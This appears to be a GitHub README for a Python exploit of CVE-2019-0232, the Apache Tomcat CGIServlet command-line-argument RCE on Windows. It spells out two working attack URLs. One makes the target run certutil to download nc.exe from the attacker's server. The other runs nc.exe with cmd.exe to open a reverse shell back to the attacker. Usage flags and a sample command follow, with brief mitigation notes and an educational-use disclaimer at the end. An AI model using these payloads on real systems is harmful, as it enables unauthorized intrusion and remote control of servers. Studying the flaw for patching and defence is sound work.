This project was forked from https://github.com/jaiguptanick/CVE-2019-0232.
This repository contains an enhanced Python script for exploiting the Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution (RCE) vulnerability, known as CVE-2019-0232. This vulnerability allows for remote code execution on Windows systems under certain configurations.
Apache Tomcat's CGI Servlet can be exploited to achieve RCE on Windows when running with enableCmdLineArguments
enabled. This is only applicable in a non-default configuration alongside batch files. The CGI Servlet is disabled by default, and from Tomcat 9.0.x onwards, enableCmdLineArguments
is also disabled by default as a response to this vulnerability.
- Apache Tomcat 9.0.0.M1 to 9.0.17
- Apache Tomcat 8.5.0 to 8.5.39
- Apache Tomcat 7.0.0 to 7.0.93
The exploit script executes two primary actions to leverage the CVE-2019-0232 vulnerability in Apache Tomcat:
- Downloading Netcat Using certutil
url_download_nc = f"http://{args.target}:{args.targetPort}/cgi/{args.script}.bat?&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F{args.attackIp}:{args.webServerPort}%2Fnc%2Eexe+nc.exe"
- Action: This URL uses the vulnerable CGI script to execute Windows certutil utility, abusing its capability to fetch files from the web.
- Abuse of certutil: It's exploited to download nc.exe (Netcat) from the attacker's server, leveraging certutil's -urlcache -split -f options to download and save files from a URL.
- Establishing Reverse Shell with Netcat
url_reverse_shell = f"http://{args.target}:{args.targetPort}/cgi/{args.script}.bat?&nc.exe+{args.attackIp}+{args.ncListenerPort}+-e+cmd.exe"
- Action: Once nc.exe is on the target system, a second crafted URL invokes nc.exe through the CGI script, instructing it to connect back to the attacker's machine, effectively opening a reverse shell.
- Mechanism: nc.exe uses the -e cmd.exe option to bind the command shell (cmd.exe) to the network connection, granting shell access to the attacker.
These steps exploit the CGI Servlet's vulnerability in command-line argument handling, first by downloading a necessary tool using certutil, then by executing it to gain unauthorized access.
The provided Python script automates the process of exploiting this vulnerability to gain a reverse shell on the vulnerable system. The script uses command-line arguments for configuration, allowing for flexible deployment.
- Python 3.x installed on your system.
requests
library installed in Python. Install via pip if necessary:pip install requests
- Target system must be running a vulnerable version of Apache Tomcat on Windows.
- Attacker must have a reachable web server to serve
nc.exe
and a Netcat listener to receive the reverse shell connection.
-t
or--target
: Target IP address.-p
or--targetPort
: Target port (default: 8080).-s
or--script
: Script to use for the attack (default: cmd).-a
or--attackIp
: Attacker's IP address.-w
or--webServerPort
: Attacker's web server port (default: 80).-n
or--ncListenerPort
: Netcat listener port.
python cve-2019-0232.py -t 192.168.1.100 -a 192.168.1.10 -n 4444
- Disable CGI support in Tomcat, as it is disabled by default.
- Ensure
enableCmdLineArguments
is set tofalse
within the CGI Servlet initialization parameters. - Apache has implemented a regex pattern to prevent input from executing commands on Windows systems.
- Original CVE Details: CVE-2019-0232
- Various analysis and mitigation recommendations:
This script is provided for educational purposes only. Use it responsibly and always with permission on systems you are authorized to test.